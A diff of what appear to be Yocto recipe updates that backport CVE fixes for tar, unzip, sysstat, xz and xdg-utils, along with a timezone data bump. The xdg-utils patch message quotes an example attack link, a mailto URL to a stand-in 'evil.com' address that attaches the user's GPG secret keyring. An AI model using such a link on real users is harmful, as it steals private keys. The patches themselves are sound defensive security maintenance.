+- fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n", +- __FUNCTION__, +- (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3); ++ fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n", ++ __FUNCTION__, val1, val2, val3); + #endif +- exit(4); ++ exit(4); + } + } + diff --git a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb index 2a90f89d25..ac7b898db9 100644 --- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb +++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb @@ -2,7 +2,10 @@ require sysstat.inc LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb" -SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch" +SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \ + file://CVE-2022-39377.patch \ + file://CVE-2023-33204.patch \ + " SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb" SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732" diff --git a/meta/recipes-extended/tar/tar/CVE-2022-48303.patch b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch new file mode 100644 index 0000000000..b2f40f3e64 --- /dev/null +++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch @@ -0,0 +1,43 @@ +From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Sat, 11 Feb 2023 11:57:39 +0200 +Subject: Fix boundary checking in base-256 decoder + +* src/list.c (from_header): Base-256 encoding is at least 2 bytes +long. + +Upstream-Status: Backport [see reference below] +CVE: CVE-2022-48303 + +Reference to upstream patch: +https://savannah.gnu.org/bugs/?62387 +https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8 + +Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com> +Signed-off-by: Joe Slater <joe.slater@windriver.com> +--- + src/list.c | 5 +++-- + 1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com> + + +(limited to 'src/list.c') + +diff --git a/src/list.c b/src/list.c +index 9fafc42..86bcfdd 100644 +--- a/src/list.c ++++ b/src/list.c +@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type, + where++; + } + } +- else if (*where == '\200' /* positive base-256 */ +- || *where == '\377' /* negative base-256 */) ++ else if (where <= lim - 2 ++ && (*where == '\200' /* positive base-256 */ ++ || *where == '\377' /* negative base-256 */)) + { + /* Parse base-256 output. A nonnegative number N is + represented as (256**DIGS)/2 + N; a negative number -N is +-- +cgit v1.1 + diff --git a/meta/recipes-extended/tar/tar/CVE-2023-39804.patch b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch new file mode 100644 index 0000000000..f550928540 --- /dev/null +++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch @@ -0,0 +1,64 @@ +From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Sat, 28 Aug 2021 16:02:12 +0300 +Subject: Fix handling of extended header prefixes + +* src/xheader.c (locate_handler): Recognize prefix keywords only +when followed by a dot. +(xattr_decoder): Use xmalloc/xstrdup instead of alloc + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4] +CVE: CVE-2023-39804 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/xheader.c | 17 +++++++++-------- + 1 file changed, 9 insertions(+), 8 deletions(-) + +diff --git a/src/xheader.c b/src/xheader.c +index 4f8b2b2..3cd694d 100644 +--- a/src/xheader.c ++++ b/src/xheader.c +@@ -637,11 +637,11 @@ static struct xhdr_tab const * + locate_handler (char const *keyword) + { + struct xhdr_tab const *p; +- + for (p = xhdr_tab; p->keyword; p++) + if (p->prefix) + { +- if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0) ++ size_t kwlen = strlen (p->keyword); ++ if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0) + return p; + } + else +@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st, + char const *keyword, char const *arg, size_t size) + { + char *xstr, *xkey; +- ++ + /* copy keyword */ +- size_t klen_raw = strlen (keyword); +- xkey = alloca (klen_raw + 1); +- memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */; ++ xkey = xstrdup (keyword); + + /* copy value */ +- xstr = alloca (size + 1); ++ xstr = xmalloc (size + 1); + memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */; + + xattr_decode_keyword (xkey); + +- xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size); ++ xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size); ++ ++ free (xkey); ++ free (xstr); + } + + static void +-- +cgit v1.1 + diff --git a/meta/recipes-extended/tar/tar_1.32.bb b/meta/recipes-extended/tar/tar_1.32.bb index 3ae6d674a5..9297480e85 100644 --- a/meta/recipes-extended/tar/tar_1.32.bb +++ b/meta/recipes-extended/tar/tar_1.32.bb @@ -6,9 +6,13 @@ SECTION = "base" LICENSE = "GPLv3" LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" +PR = "r1" + SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \ file://musl_dirent.patch \ file://CVE-2021-20193.patch \ + file://CVE-2022-48303.patch \ + file://CVE-2023-39804.patch \ " SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05" @@ -65,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native" NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" BBCLASSEXTEND = "native nativesdk" + +# Avoid false positives from CVEs in node-tar package +# For example CVE-2021-{32803,32804,37701,37712,37713} +CVE_PRODUCT = "gnu:tar" diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc index a89560b424..46bc1b794e 100644 --- a/meta/recipes-extended/timezone/timezone.inc +++ b/meta/recipes-extended/timezone/timezone.inc @@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \ the history of local time for many representative locations around the globe." HOMEPAGE = "http://www.iana.org/time-zones" SECTION = "base" -LICENSE = "PD & BSD & BSD-3-Clause" +LICENSE = "PD & BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" -PV = "2021a" +PV = "2024a" SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ @@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" -SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" -SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" +SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8" +SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3" diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb index e6a0655afe..cc6206ac70 100644 --- a/meta/recipes-extended/timezone/tzdata.bb +++ b/meta/recipes-extended/timezone/tzdata.bb @@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \ " # pacificnew +# "slim" is the default since 2020b +# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql +ZIC_FMT ?= "slim" + do_compile () { for zone in ${TZONES}; do \ - ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \ + ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \ ${S}/${zone} ; \ - ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \ + ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \ ${S}/${zone} ; \ - ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \ + ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \ ${S}/${zone} ; \ done } diff --git a/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch new file mode 100644 index 0000000000..6ba2b879a3 --- /dev/null +++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch @@ -0,0 +1,67 @@ +From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001 +From: Nils Bars <nils.bars@t-online.de> +Date: Mon, 17 Jan 2022 16:53:16 +0000 +Subject: [PATCH] Fix null pointer dereference and use of uninitialized data + +This fixes a bug that causes use of uninitialized heap data if `readbuf` fails +to read as many bytes as indicated by the extra field length attribute. +Furthermore, this fixes a null pointer dereference if an archive contains an +`EF_UNIPATH` extra field but does not have a filename set. +--- + fileio.c | 5 ++++- + process.c | 6 +++++- + 2 files changed, 9 insertions(+), 2 deletions(-) +--- + +Patch from: +https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077 +https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch +Regenerated to apply without offsets. + +CVE: CVE-2021-4217 + +Upstream-Status: Pending [infozip upstream inactive] + +Signed-off-by: Joe Slater <joe.slater@windriver.com> + + +diff --git a/fileio.c b/fileio.c +index 14460f3..1dc319e 100644 +--- a/fileio.c ++++ b/fileio.c +@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */ + seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes + + (G.inptr-G.inbuf) + length); + } else { +- if (readbuf(__G__ (char *)G.extra_field, length) == 0) ++ unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length); ++ if (bytes_read == 0) + return PK_EOF; ++ if (bytes_read != length) ++ return PK_ERR; + /* Looks like here is where extra fields are read */ + if (getZip64Data(__G__ G.extra_field, length) != PK_COOL) + { +diff --git a/process.c b/process.c +index 5f8f6c6..de843a5 100644 +--- a/process.c ++++ b/process.c +@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len) + G.unipath_checksum = makelong(offset + ef_buf); + offset += 4; + ++ if (!G.filename_full) { ++ /* Check if we have a unicode extra section but no filename set */ ++ return PK_ERR; ++ } ++ + /* + * Compute 32-bit crc + */ +- + chksum = crc32(chksum, (uch *)(G.filename_full), + strlen(G.filename_full)); + +-- +2.32.0 + diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch new file mode 100644 index 0000000000..1c1e120deb --- /dev/null +++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch @@ -0,0 +1,39 @@ +https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355 + +CVE: CVE-2022-0529 +Upstream-Status: Inactive-Upstream [need a new release] + +diff --git a/process.c b/process.c +index d2a846e..99b9c7b 100644 +--- a/process.c ++++ b/process.c +@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all) + char buf[9]; + char *buffer = NULL; + char *local_string = NULL; ++ size_t buffer_size; + + for (wsize = 0; wide_string[wsize]; wsize++) ; + + if (max_bytes < MAX_ESCAPE_BYTES) + max_bytes = MAX_ESCAPE_BYTES; + +- if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) { ++ buffer_size = wsize * max_bytes + 1; ++ if ((buffer = (char *)malloc(buffer_size)) == NULL) { + return NULL; + } + +@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all) + /* no MB for this wide */ + /* use escape for wide character */ + char *escape_string = wide_to_escape_string(wide_string[i]); +- strcat(buffer, escape_string); ++ size_t buffer_len = strlen(buffer); ++ size_t escape_string_len = strlen(escape_string); ++ if (buffer_len + escape_string_len + 1 > buffer_size) ++ escape_string_len = buffer_size - buffer_len - 1; ++ strncat(buffer, escape_string, escape_string_len); + free(escape_string); + } + } diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch new file mode 100644 index 0000000000..363dafddc9 --- /dev/null +++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch @@ -0,0 +1,33 @@ +https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355 + +CVE: CVE-2022-0530 +Upstream-Status: Inactive-Upstream [need a new release] + +diff --git a/fileio.c b/fileio.c +index 6290824..77e4b5f 100644 +--- a/fileio.c ++++ b/fileio.c +@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */ + /* convert UTF-8 to local character set */ + fn = utf8_to_local_string(G.unipath_filename, + G.unicode_escape_all); ++ if (fn == NULL) ++ return PK_ERR; ++ + /* make sure filename is short enough */ + if (strlen(fn) >= FILNAMSIZ) { + fn[FILNAMSIZ - 1] = '\0'; +diff --git a/process.c b/process.c +index d2a846e..715bc0f 100644 +--- a/process.c ++++ b/process.c +@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all) + int escape_all; + { + zwchar *wide = utf8_to_wide_string(utf8_string); ++ if (wide == NULL) ++ return NULL; + char *loc = wide_to_local_string(wide, escape_all); + free(wide); + return loc; + diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb index af5530ab38..fa57c8f5bd 100644 --- a/meta/recipes-extended/unzip/unzip_6.0.bb +++ b/meta/recipes-extended/unzip/unzip_6.0.bb @@ -26,6 +26,9 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/ file://CVE-2019-13232_p1.patch \ file://CVE-2019-13232_p2.patch \ file://CVE-2019-13232_p3.patch \ + file://CVE-2021-4217.patch \ + file://CVE-2022-0529.patch \ + file://CVE-2022-0530.patch \ " UPSTREAM_VERSION_UNKNOWN = "1" diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch @@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim <joerg@thalheim.io> +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch new file mode 100644 index 0000000000..383634ad53 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch @@ -0,0 +1,165 @@ +From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001 +From: Gabriel Corona <gabriel.corona@enst-bretagne.fr> +Date: Thu, 25 Aug 2022 23:51:45 +0200 +Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes + CVE-2020-27748, CVE-2022-4055) + +Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780] +CVE: CVE-2022-4055 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + scripts/xdg-email.in | 108 ------------------------------------------- + 1 file changed, 108 deletions(-) + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 13ba2d5..b700679 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -30,76 +30,8 @@ _USAGE + + #@xdg-utils-common@ + +-run_thunderbird() +-{ +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY +- THUNDERBIRD="$1" +- MAILTO=$(echo "$2" | sed 's/^mailto://') +- echo "$MAILTO" | grep -qs "^?" +- if [ "$?" = "0" ] ; then +- MAILTO=$(echo "$MAILTO" | sed 's/^?//') +- else +- MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/') +- fi +- +- MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g') +- TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) +- CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) +- BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) +- SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) +- BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- +- if [ -z "$TO" ] ; then +- NEWMAILTO= +- else +- NEWMAILTO="to='$TO'" +- fi +- if [ -n "$CC" ] ; then +- NEWMAILTO="${NEWMAILTO},cc='$CC'" +- fi +- if [ -n "$BCC" ] ; then +- NEWMAILTO="${NEWMAILTO},bcc='$BCC'" +- fi +- if [ -n "$SUBJECT" ] ; then +- NEWMAILTO="${NEWMAILTO},$SUBJECT" +- fi +- if [ -n "$BODY" ] ; then +- NEWMAILTO="${NEWMAILTO},$BODY" +- fi +- +- NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') +- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" +- "$THUNDERBIRD" -compose "$NEWMAILTO" +- if [ $? -eq 0 ]; then +- exit_success +- else +- exit_failure_operation_failed +- fi +-} +- + open_kde() + { +- if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then +- local kreadconfig=kreadconfig$KDE_SESSION_VERSION +- else +- local kreadconfig=kreadconfig +- fi +- +- if which $kreadconfig >/dev/null 2>&1; then +- local profile=$($kreadconfig --file emaildefaults \ +- --group Defaults --key Profile) +- if [ -n "$profile" ]; then +- local client=$($kreadconfig --file emaildefaults \ +- --group "PROFILE_$profile" \ +- --key EmailClient \ +- | cut -d ' ' -f 1) +- +- if echo "$client" | grep -Eq 'thunderbird|icedove'; then +- run_thunderbird "$client" "$1" +- fi +- fi +- fi +- + local command + case "$KDE_SESSION_VERSION" in + '') command=kmailservice ;; +@@ -130,15 +62,6 @@ open_kde() + + open_gnome3() + { +- local client +- local desktop +- desktop=`xdg-mime query default "x-scheme-handler/mailto"` +- client=`desktop_file_to_binary "$desktop"` +- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1 +- if [ $? -eq 0 ] ; then +- run_thunderbird "$client" "$1" +- fi +- + if gio help open 2>/dev/null 1>&2; then + DEBUG 1 "Running gio open \"$1\"" + gio open "$1" +@@ -159,13 +82,6 @@ open_gnome3() + + open_gnome() + { +- local client +- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || "" +- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1 +- if [ $? -eq 0 ] ; then +- run_thunderbird "$client" "$1" +- fi +- + if gio help open 2>/dev/null 1>&2; then + DEBUG 1 "Running gio open \"$1\"" + gio open "$1" +@@ -231,15 +147,6 @@ open_flatpak() + + open_generic() + { +- local client +- local desktop +- desktop=`xdg-mime query default "x-scheme-handler/mailto"` +- client=`desktop_file_to_binary "$desktop"` +- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1 +- if [ $? -eq 0 ] ; then +- run_thunderbird "$client" "$1" +- fi +- + xdg-open "$1" + local ret=$? + +@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do + shift + ;; + +- --attach) +- if [ -z "$1" ] ; then +- exit_failure_syntax "file argument missing for --attach option" +- fi +- check_input_file "$1" +- file=`readlink -f "$1"` # Normalize path +- if [ -z "$file" ] || [ ! -f "$file" ] ; then +- exit_failure_file_missing "file '$1' does not exist" +- fi +- +- url_encode "$file" +- options="${options}attach=${result}&" +- shift +- ;; +- + -*) + exit_failure_syntax "unexpected option '$parm'" + ;; +-- +2.25.1 + diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..f6989430f5 100644 --- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ + file://CVE-2022-4055.patch \ " SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb index da81867115..765a34e842 100644 --- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb +++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb @@ -13,7 +13,7 @@ PR = "r2" # Blacklist a bogus tag in upstream check UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)" -SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \ +SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \ file://xinetd.init \ file://xinetd.conf \ file://xinetd.default \ diff --git a/meta/recipes-extended/xz/xz/CVE-2022-1271.patch b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch new file mode 100644 index 0000000000..7841a534d3 --- /dev/null +++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch @@ -0,0 +1,96 @@ +From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001 +From: Lasse Collin <lasse.collin@tukaani.org> +Date: Tue, 29 Mar 2022 19:19:12 +0300 +Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587). + +Malicious filenames can make xzgrep to write to arbitrary files +or (with a GNU sed extension) lead to arbitrary code execution. + +xzgrep from XZ Utils versions up to and including 5.2.5 are +affected. 5.3.1alpha and 5.3.2alpha are affected as well. +This patch works for all of them. + +This bug was inherited from gzip's zgrep. gzip 1.12 includes +a fix for zgrep. + +The issue with the old sed script is that with multiple newlines, +the N-command will read the second line of input, then the +s-commands will be skipped because it's not the end of the +file yet, then a new sed cycle starts and the pattern space +is printed and emptied. So only the last line or two get escaped. + +One way to fix this would be to read all lines into the pattern +space first. However, the included fix is even simpler: All lines +except the last line get a backslash appended at the end. To ensure +that shell command substitution doesn't eat a possible trailing +newline, a colon is appended to the filename before escaping. +The colon is later used to separate the filename from the grep +output so it is fine to add it here instead of a few lines later. + +The old code also wasn't POSIX compliant as it used \n in the +replacement section of the s-command. Using \<newline> is the +POSIX compatible method. + +LC_ALL=C was added to the two critical sed commands. POSIX sed +manual recommends it when using sed to manipulate pathnames +because in other locales invalid multibyte sequences might +cause issues with some sed implementations. In case of GNU sed, +these particular sed scripts wouldn't have such problems but some +other scripts could have, see: + + info '(sed)Locale Considerations' + +This vulnerability was discovered by: +cleemy desu wayo working with Trend Micro Zero Day Initiative + +Thanks to Jim Meyering and Paul Eggert discussing the different +ways to fix this and for coordinating the patch release schedule +with gzip. + +Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch] +CVE: CVE-2022-1271 + +Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org> +--- + src/scripts/xzgrep.in | 20 ++++++++++++-------- + 1 file changed, 12 insertions(+), 8 deletions(-) + +diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in +index a1fd19c..da1e65b 100644 +--- a/src/scripts/xzgrep.in ++++ b/src/scripts/xzgrep.in +@@ -178,22 +178,26 @@ for i; do + { test $# -eq 1 || test $no_filename -eq 1; }; then + eval "$grep" + else ++ # Append a colon so that the last character will never be a newline ++ # which would otherwise get lost in shell command substitution. ++ i="$i:" ++ ++ # Escape & \ | and newlines only if such characters are present ++ # (speed optimization). + case $i in + (*' + '* | *'&'* | *'\'* | *'|'*) +- i=$(printf '%s\n' "$i" | +- sed ' +- $!N +- $s/[&\|]/\\&/g +- $s/\n/\\n/g +- ');; ++ i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');; + esac +- sed_script="s|^|$i:|" ++ ++ # $i already ends with a colon so don't add it here. ++ sed_script="s|^|$i|" + + # Fail if grep or sed fails. + r=$( + exec 4>&1 +- (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&- ++ (eval "$grep" 4>&-; echo $? >&4) 3>&- | ++ LC_ALL=C sed "$sed_script" >&3 4>&- + ) || r=2 + exit $r + fi >&3 5>&- diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb index 67a6cbd569..6d80a4f2e9 100644 --- a/meta/recipes-extended/xz/xz_5.2.4.bb +++ b/meta/recipes-extended/xz/xz_5.2.4.bb @@ -23,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \ file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \ " -SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz" +SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \ + file://CVE-2022-1271.patch \ + " SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6" SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145" UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar" |